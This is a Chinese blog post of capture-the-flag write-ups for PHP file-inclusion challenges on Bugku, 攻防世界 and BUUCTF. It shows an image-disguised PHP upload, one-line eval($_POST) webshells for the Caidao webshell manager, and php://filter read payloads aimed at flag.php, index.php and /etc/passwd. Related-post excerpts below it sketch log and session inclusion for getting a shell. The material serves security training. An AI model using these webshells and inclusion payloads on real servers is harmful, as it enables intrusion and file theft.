WEB_文件包含

最新推荐文章于 2024-05-12 23:02:18 发布
最新推荐文章于 2024-05-12 23:02:18 发布
阅读量28 收藏
点赞数
分类专栏: web 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65204980/article/details/134656336
版权

文件包含

Bugku

2.文件包含

1

进入场景一个封面 没有什么提示

可能是隐藏了 看源代码发现<!-- upload.php -->进入看看 发现上传界面

法一:新建一个txt文件写入  <script language=php>system("ls")</script>  后另存为 jpg 格式 选择浏览上传文件访问 保存进去的文件 即 Save in 后面的图片路径因为我们写入了ls命令,用于显示当前目录下所有文件,发现了flag文件

http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt

法二:不需要上传什么文件,直接upload然后抓包 然后ctrl+r发送到reperter里面,传入一句话木马 <?=eval($_POST['pass']);>改动如下:(在request修改完点go会在response返显) 进入文件路径得到flag

法三:一句话木马,连接菜刀 我们将方法二的一句话改成下面这个 <script language=php>echo 'a'; eval($_POST['pass']);</script>这种方法会返回a。并且菜刀连接成功。

咱用第三种得到flag

2

进入靶场什么没发现 F12看到注释像网页

访问看看发现个上传页面

直接抓包上传木马文件得到路径

上面不可以连接 就用下面那个格式

菜刀连接不上

解决

1.连接不上就直接访问路径看看 好吧什么也没有

  1. 直接用构造系统语句上传再访问路径 得到文件

用这个访问文件得到flag

39.文件包含

进入看到一个链接

进入看到他的链接多了点东西http://114.67.175.224:11955/index.php?file=show.php

看到file知道是这个为突破点了

Payload:?file=php://filter/read=convert.base64-encode/resource=index.php

读取出来

解码得到flag

攻防世界

1.题目名称-文件包含

进入场景看到一串代码

题目提示文件包含就想到了php://filter 加 convert.base64-encode 文件读取 flag.php

?filename=php://filter/read=convert.base64/resource=/etc/passwd

用data试一试

可以通过data filename=php://data://text/plain,%20phpinfo();

过不去 发现跟过滤了一些单词 read base64

只能用其他filt过滤器绕过得到flag

?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

Buuctf

[极客挑战]

1. SecretFile

页面没有任何提示F12查看一源码看看先

查看F12的时候发现有一个链接

点击之后

没有什么有效信息

尝试用burpsuite抓包看看能不能获取有用信息

在响应头的html处获取到一个新的php

secr3t.php

访问之后得到新的内容

提示说flag值在flag.php里面

猜测需要使用php仿协议进行

?file=php://filter/read=convert.base64-encode/resource=flag.php
 

读取flag.php源码

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZjY5YjI1ZjItODYxZC00OTk1LTg5MTEtMDU4MzU5OTZiNzdhfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
 

进行base64解码
 

 

获得flag
 

2. Include
 

打开发现只有一个链接,点击链接跳转瞅瞅
 

 

 

跳转之后发现只有一句话
 

Can you find out the flag?
 

URL: http://ec15d0b0-6c6b-4605-8282-6ed2f91853e7.node4.buuoj.cn:81/?file=flag.php
 

链接显示为?file=flag.php,大胆猜测一下为文件包含类型的题目
 

采用PHP仿协议读取内容
 

?file=php://filter/read=convert.base64-encode/resource=index.php
 

?file=php://filter?read=convert.base64-encode/resource=flag.php
 

php://filter:这个语句用来查看源码。直接包含php文件时会被解析,不能看到源码,所以用filter来读取,不过要先base64加密传输过
 

 

得到
 

 

通过base64解码查看index.php源码
 

 

再次通过仿协议读取flag.php
 

 

再次解码
 

 

得到flag值
 

 


                

        

        

    




    

      

        

            

              
                
                  小犹太879
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
WEB常见漏洞之文件包含(基础原理篇)

				
			

			

				

					One-Fox安全团队的博客
				

				

					07-01
					
					285
					
				

			

		

		

			
				
使用方法主要适用于在服务端代码里已写死后缀名(.txt),如只能传入文件名(1),当传入完整文件名(1.txt)时会发生错误,00截断就能帮助绕过这类限制完成getshell上传带有木马的图片文件包含通过00截断访问目标图片,如 test.php?使用蚁剑连接目标0x02 超长文件截断php < 5.2 .8 文件名要求:linux文件名需长于 4096 winodws文件名需长于 256。

			
		

	



                

              
                



	

		

			

				
					
Web安全——文件包含漏洞

				
			

			

				

					qq_44915227的博客
				

				

					04-22
					
					1062
					
				

			

		

		

			
				
文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的。在PHP中,有四个用于包含文件的函数,当使用这些函数包含文件时,文件中包含的PHP代码会被执行。本地文件包含LFI(Local File Inclusion)当被包含的文件在服务器本地时,就形成本地文件包含

			
		

	



                


  
              

                


	

		

			

				
					
WEB安全-文件包含

				
			

			

				

					qq_59350385的博客
				

				

					03-01
					
					3119
					
				

			

		

		

			
				
一、文件包含的定义

如果说使用文件包含的路径是攻击者可控的话,此时,我们可以通过控制参数变量从而能包含本不在开发者意愿之内的文件。

    本地文件包含:包含服务器端的文件

    远程文件包含:包含远程url的文件 (allow_url_fopen allow_url_include)

可以用什么去截断:? #(%23)

二、文件包含的利用

1.配合文件上传漏洞执行getshell

2.包含日志getshell
...

			
		

	





	

		

			

				
					
Web文件包含

					
最新发布

				
			

			

				

					q
				

				

					05-12
					
					954
					
				

			

		

		

			
				
包含的文件被当作当前的语言去代码执行漏洞原因:1.使用文件包含函数2.包含的文件可控分类:1.本地包含:​	有文件利用:配合文件上传​	无文件利用:​				1.包含日志文件​				2.包含session文件​				3.伪协议利用2.远程包含:公网服务器自定义文件差异:代码过滤,  allow_url_include配置开关白盒发现:包含函数黑盒发现:主要观察参数传递的数据和文件名是否对应。

			
		

	



		

			
		



	

		

			

				
					
web安全--文件包含(本地包含,远程包含)

				
			

			

				

					nareku的博客
				

				

					04-05
					
					4291
					
				

			

		

		

			
				
前言

文件包含漏洞简介:

文件包含的函数的参数没有经过过滤或者是严格的定义,并且参数可以被用户所控制,这样就可能包含非预期的文件。

一.文件包含漏洞常见的函数(默认都以php脚本为准啊)

①include: 包含并运行指定的文件,Include在出错的时候产生警告,脚本会继续运行

②include_once:在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。

③require :

			
		

	





	

		

			

				
					
en_core_web_sm-3.0.0.tar、2.3.0.tar、2.3.1.tar


				
			

			

				

					01-23
				

			

		

		

			
				
标题中的"en_core_web_sm-3.0.0.tar、2.3.0.tar、2.3.1.tar"指的是`en_core_web_sm`模型的不同版本的归档文件,这些文件通常包含自然语言处理(NLP)库的资源。`en_core_web_sm`是英语的Spacy模型的一个小型版本,...

			
		

	





	

		

			

				
					
快速处理基于 Web 的各种图象文件.zip_WEB 文件_zip

				
			

			

				

					09-23
				

			

		

		

			
				
6. StdAfx.cpp:这个文件包含了预编译头文件(预编译的常量和标准库),可以加速编译过程。  7. WebImg.dsp:这是另一个Visual Studio项目文件,记录了项目的详细信息,如编译器设置、链接器选项等。  综合以上信息...

			
		

	





	

		

			

				
					
WebServer.zip_Web 文件服务_web服务器

				
			

			

				

					07-15
				

			

		

		

			
				
c)利用HTML语言编写网页(可以不包括图像、声音等多媒体文件),浏览器可通过编写的Web服务器正常访问该网页; d)支持多用户并发访问; e)在Windows平台下,采用C/C++语言; f)扩展编写的简单Web服务器,使...

			
		

	





	

		

			

				
					
files_system_web_php.rar_文件管理

				
			

			

				

					09-21
				

			

		

		

			
				
文件管理系统在IT行业中扮演着至关重要的角色,尤其是在Web开发领域。本系统名为“files_system_web_php”,显然是一款基于Web的PHP文件管理系统。该系统具备多种关键功能,旨在帮助企业或个人更有效地管理和组织...

			
		

	





	

		

			

				
					
Web_project.rar_Web_project_web project

				
			

			

				

					09-20
				

			

		

		

			
				
强调了这是一个Web开发项目,可能意味着该项目包含了一系列与Web开发相关的组件和配置,如HTML、CSS、JavaScript(包括可能的jQuery库或类似的前端框架)、JSP(JavaServer Pages)以及相关的Struts2配置文件。...

			
		

	





	

		

			

				
					
web漏洞:文件包含

				
			

			

				

					2301_79688134的博客
				

				

					03-06
					
					806
					
				

			

		

		

			
				
文件包含是一个功能,在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另一个代码文件,比如在PHP中提供了include(),include_once(),require,require_once (),这些文件包含函数在代码设计中经常被使用到。

			
		

	





	

		

			

				
					
web攻防——文件包含

				
			

			

				

					2303_79592445的博客
				

				

					02-29
					
					655
					
				

			

		

		

			
				
但是浏览器先会自动帮你解码,然后php又会被识别出来,然后,urldecode又会再次进行解码,进行两次解码这样还是会过滤。然后通过post传参将后门写入(注意要记得将这个后门代码编码,因为看上面它这个伪协议后门是将他解码的)首先我们先查看中间件,发现是nginx,于是我们就去网上搜索nginx的日志记录文件的地址。然后通过伪协议,进行包含,那么当include看到这个base64就会自动解码。然后这个后门代码就会被写入session文件之中,然后再进行包含就可以了。

			
		

	





	

		

			

				
					
Web安全文件包含漏洞,漏洞分类区别和危害及利用。

				
			

			

				

					logic1001的博客
				

				

					01-05
					
					961
					
				

			

		

		

			
				
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。动态包含。

			
		

	





	

		

			

				
					
Web的基本漏洞--文件包含漏洞

				
			

			

				

					尽欢的博客
				

				

					05-31
					
					1404
					
				

			

		

		

			
				
文件包含漏洞介绍

			
		

	





	

		

			

				
					
Web漏洞-文件包含漏洞超详细全解(附实例)

				
			

			

				

					ran的博客
				

				

					04-05
					
					5566
					
				

			

		

		

			
				
",因为在进行文件包含的时候,回根据网站的脚本类型来执行文件内的内容,而这里网站的脚本类型本身就是php,所以不加"

			
		

	





	

		

			

				
					
web-文件包含

				
			

			

				

					bingo_csdn的博客
				

				

					10-29
					
					2258
					
				

			

		

		

			
				
inclued:出错会继续执行
require:出错会退出
1、本地文件包含:
测试代码1.php如下所示:
<?php
//初始化....
define("ROOT",dirname(__FILE__).'/');
//加载模块
$mod = $_GET['mod'];
echo ROOT.$mod.'.php';
include(ROOT.$mod.'.php');
?>
我们在同目录下2.php写入如下代码:
<?php phpinfo();?>
请求/1.php?mod=2即

			
		

	





	

		

			

				
					
Web漏洞之文件包含漏洞

				
			

			

				

					zkaqlaoniao的博客
				

				

					10-28
					
					6922
					
				

			

		

		

			
				
公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习


一、文件包含漏洞概述

1、漏洞介绍

程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。

在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚.

			
		

	





	

		

			

				
					
web渗透之文件包含漏洞-学习笔记分享

				
			

			

				

					weixin_52112965的博客
				

				

					07-16
					
					1091
					
				

			

		

		

			
				
文件包含知识的总结

			
		

	





	

		

			

				
					
webCTF文件包含

				
			

			

				

					04-24
				

			

		

		

			
				
WebCTF文件包含是一种常见的Web安全漏洞,也被称为文件包含漏洞。它指的是在Web应用程序中,未正确过滤用户输入导致恶意用户可以通过构造特定的请求,将本应该被限制访问的文件包含到页面中。  文件包含漏洞通常存在...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值